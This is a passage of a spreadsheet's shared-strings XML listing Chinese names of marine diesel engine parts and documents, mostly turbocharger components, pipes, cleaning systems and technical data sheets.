        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆钢</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆密封圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆铁丝</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆头紧配螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆头螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆形垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆形毛布填料</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆柱销</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆柱销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆柱止动销</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆锥齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆锥齿轮毂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆锥螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆锥套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆锥形衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆锥形压缩弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运行</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运行后操纵余量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运行设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运输基础</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运转数据和设置点</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杂项</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>载体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>再循环器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在线</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PMI</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在运行状态下汽缸油的注油率</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增订件</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增速装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压泵外壳超声波探伤质量规格书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压复合系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压空气管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压空气冷却管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压空气冷却组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压空气歧管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器，停止</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器座，焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器布置清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器部件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器，扫气压力一览表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器部件涡轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直径</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活动因素</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器测速系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器喘振</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器的排污</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器底部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器底座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器干清洁，透平侧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器干洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器干洗管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器干洗装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器高温进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器更换</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器供货图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器管道布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器和空冷器清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器和排气管支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器后端排气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器后盲板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油出口放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油管出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油系统详细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器基本件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器及旁通技术数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器急剧降速时喘振</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器技术数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器空冷器单元布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器螺栓连接弯头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器密封空气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器密封空气系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器排放口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器喷嘴清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器前绝缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器前排气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器切断阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器切断阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模型</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器切断系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洁管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洁系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洗放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洗管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洗管支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器燃气管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器润滑布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器润滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器水清洗装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器水洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器水洗布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器特殊运行</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器效率的计算</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器一览表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
